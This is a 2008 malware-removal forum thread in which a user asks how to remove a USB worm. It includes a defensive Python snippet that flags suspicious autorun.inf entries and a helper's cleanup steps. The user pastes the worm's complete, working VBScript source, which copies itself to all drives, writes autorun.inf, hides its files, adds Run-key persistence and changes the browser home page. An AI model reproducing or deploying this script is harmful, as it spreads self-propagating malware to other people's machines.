Author Topic: Cannot Remove "autorun.inf" and "sys.dll.vbs"  (Read 11522 times)

eugeneafable

  • Guest
Cannot Remove "autorun.inf" and "sys.dll.vbs"
« on: April 17, 2008, 06:51:06 PM »
I have this problem on my internal and external hard disks. Every time I double-click, it does not respond. When I right-click my drive C, it enables "AutoPlay". I have the same problem with my external hard disk; it also enables AutoPlay. I tried to solve it and found out that these 2 mysterious files, autorun.inf and sys.dll.vbs, are saved as hidden files on drive C and on my external hard disk. I opened them with Notepad and they contain command lines. autorun.inf has the following text inside:



[autorun]
shellexecute=wscript.exe sys.dll.vbs


sys.dll.vbs has the following text inside:


On Error Resume Next

Dim mydate, myvbsalias, myvbsfile, mysource, winpath, winsyspath, flashdrive, fs, mycmdfile, cmd, atr, tf, rg, nt, check, sd

mycmdfile = "cmd.exe"

mydate = month(now()) & day(now())
myvbsalias = "sys"
myvbsfile = myvbsalias & ".dll.vbs"

atr = "[autorun]" & vbCrLf & _
      "shellexecute=wscript.exe " & myvbsfile

Set fs = CreateObject("Scripting.FileSystemObject")

Dim mf, text, size

Set mf = fs.GetFile(WScript.ScriptFullname)

size = mf.size
check = mf.Drive.drivetype

Set text = mf.openastextstream(1, -2)

Do While Not text.atendofstream
   mysource = mysource & text.readline
   mysource = mysource & vbCrLf
Loop

Do
   Set winpath = fs.GetSpecialFolder(0)

   Set tf = fs.GetFile(winpath & "\" & myvbsfile)

   tf.Attributes = 32

   Set tf = fs.CreateTextFile(winpath & "\" & myvbsfile, 2, True)

   tf.Write mysource
   tf.Close

   Set tf = fs.GetFile(winpath & "\" & myvbsfile)

   tf.Attributes = 39

  For Each flashdrive In fs.drives
      If (flashdrive.drivetype = 1 Or flashdrive.drivetype = 2) And flashdrive.Path <> "A:" Then
         Set tf = fs.GetFile(flashdrive.Path & "\" & myvbsfile)

         tf.Attributes = 32

         Set tf = fs.CreateTextFile(flashdrive.Path & "\" & myvbsfile, 2, True)

         tf.Write mysource
         tf.Close

         Set tf = fs.GetFile(flashdrive.Path & "\" & myvbsfile)

         tf.Attributes = 39

         Set tf = fs.GetFile(flashdrive.Path & "\autorun.inf")

         tf.Attributes = 32

         Set tf = fs.CreateTextFile(flashdrive.Path & "\autorun.inf", 2, True)

         tf.Write atr
         tf.Close

         Set tf = fs.GetFile(flashdrive.Path & "\autorun.inf")

         tf.Attributes = 39
      End If
   Next

   Set rg = CreateObject("WScript.Shell")

   rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", 0, "REG_DWORD"

   rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title", ""
   rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page", "http://www.porntube.com/"

   rg.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\MSConfig", winpath & "\" & myvbsfile
   rg.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSConfig", winpath & "\" & myvbsfile


   If check <> 1 Then
      WScript.sleep 200000
   End If

Loop While (check <> 1)

Set sd = CreateObject("WScript.Shell")

sd.run winpath & "\explorer.exe /e,/select, " & WScript.ScriptFullname



Both are saved on drive C or on my hard disk.

I want to remove these files.

Thanks a lot
eugene

P.S.: Do not copy this file and save it with a file extension of .inf and .vbs; this will give you a headache.

Following problems created:
1. AutoPlay on the hard disk
2. Internet Explorer homepage changed to porntube
3. It copies itself and transfers to other hard disks or flash drives.
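
A defensive triage of the two artifacts in the post above, added here as an example (not code from the thread or from any tool it mentions): it parses an autorun.inf, flags launch entries that start a script host or point at a double-extension script, and decodes the attribute value 39 that the script sets on its files. The launcher list, the extension list and the function names are assumptions of this example.

```python
import re

# Launcher names treated as suspicious when started from a drive root (assumed list).
SCRIPT_HOSTS = {"wscript", "wscript.exe", "cscript", "cscript.exe",
                "cmd", "cmd.exe", "mshta", "mshta.exe"}
# Script extension hidden behind a harmless-looking one, e.g. sys.dll.vbs (assumed list).
DOUBLE_EXT = re.compile(r"\.(dll|txt|doc|jpg|exe)\.(vbs|vbe|js|jse|wsf|bat|cmd)$", re.I)
# FileSystemObject File.Attributes bits.
ATTR_BITS = {1: "ReadOnly", 2: "Hidden", 4: "System", 32: "Archive"}


def decode_attributes(value):
    """Name the bits in a File.Attributes value such as the 39 used in the post."""
    return [name for bit, name in ATTR_BITS.items() if value & bit]


def triage_autorun(text):
    """Return (key, command, reasons) for each launch entry that looks suspicious."""
    findings, section = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            continue
        if section != "autorun" or "=" not in line:
            continue
        key, command = (part.strip() for part in line.split("=", 1))
        key = key.lower()
        # Keys that make Explorer start a program: open, shellexecute, shell\<verb>\command.
        if key not in ("open", "shellexecute") and not re.fullmatch(r"shell\\[^\\]+\\command", key):
            continue
        tokens = command.replace('"', " ").split()
        reasons = []
        if tokens and tokens[0].split("\\")[-1].lower() in SCRIPT_HOSTS:
            reasons.append("starts a script host or shell")
        if any(DOUBLE_EXT.search(tok) for tok in tokens):
            reasons.append("double-extension script target")
        if reasons:
            findings.append((key, command, reasons))
    return findings


# The autorun.inf quoted in the post, plus one constructed benign file for contrast.
INFECTED = "[autorun]\nshellexecute=wscript.exe sys.dll.vbs\n"
BENIGN = "[autorun]\nicon=setup.ico\nlabel=Backup Disk\nopen=setup.exe\n"
```

The decoded value 39 (ReadOnly, Hidden, System, Archive) is why the poster only found the files as hidden items; the script resets them to 32 (Archive only) just long enough to overwrite them.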

essexboy

  • Malware removal instructor
Re: Cannot Remove "autorun.inf" and "sys.dll.vbs"
« Reply #1 on: April 17, 2008, 10:39:59 PM »
Hi, I have two programmes for you to run which should clear it.

The first one is to delete it from your main hard drive and the other is to remove it from the external drive and any flash drives you use.


Please download ComboFix from Here or Here to your Desktop.

**Note:  In the event you already have Combofix, this is a new version that I need you to download. It is important that it is saved directly to your desktop**
  • Please, never rename Combofix unless instructed.
  • Close any open browsers.
  • Close/disable all anti virus and anti malware programs so they do not interfere with the running of ComboFix.
-----------------------------------------------------------
  • Very Important! Temporarily disable your anti-virus, script blocking and any anti-malware real-time protection before performing a scan. They can interfere with ComboFix or remove some of its embedded files which may cause "unpredictable results".
  • Click on this link to see a list of programs that should be disabled. The list is not all inclusive. If yours is not listed and you don't know how to disable it, please ask.
    -----------------------------------------------------------
  • Close any open browsers.
  • WARNING: Combofix will disconnect your machine from the Internet as soon as it starts
  • Please do not attempt to re-connect your machine back to the Internet until Combofix has completely finished.
  • If there is no internet connection after running Combofix, then restart your computer to restore back your connection.
-----------------------------------------------------------
  • Double click on combofix.exe & follow the prompts.
  • When finished, it will produce a report for you. 
  • Please post the "C:\ComboFix.txt" along with a new HijackThis log for further review.
**Note: Do not mouseclick combofix's window while it's running. That may cause it to stall**

THEN

    1 - Flash Drive Disinfector
    Download Flash_Disinfector.exe by sUBs from >here< and save it to your desktop.
    • Double-click Flash_Disinfector.exe to run it and follow any prompts that may appear.
    • The utility may ask you to insert your flash drive and/or other removable drives including your mobile phone. Please do so and allow the utility to clean up those drives as well.
    • Wait until it has finished scanning and then exit the program.
    • Reboot your computer when done.
    Note: Flash_Disinfector will create a hidden folder named autorun.inf in each partition and every USB drive plugged in when you ran it. Don't delete this folder...it will help protect your drives from future infection.

    eugeneafable

    • Guest
    Re: Cannot Remove "autorun.inf" and "sys.dll.vbs"
    « Reply #2 on: April 18, 2008, 12:46:21 PM »
    Thank you very much Mr essexboy!!! :)

    By the way, the properties of these two executable files are similar to a virus. Why does Avast not consider autorun.inf and sys.dll.vbs a virus? Can I send this problem to Avast for them to include in their updates?

    Thank you again
    eugene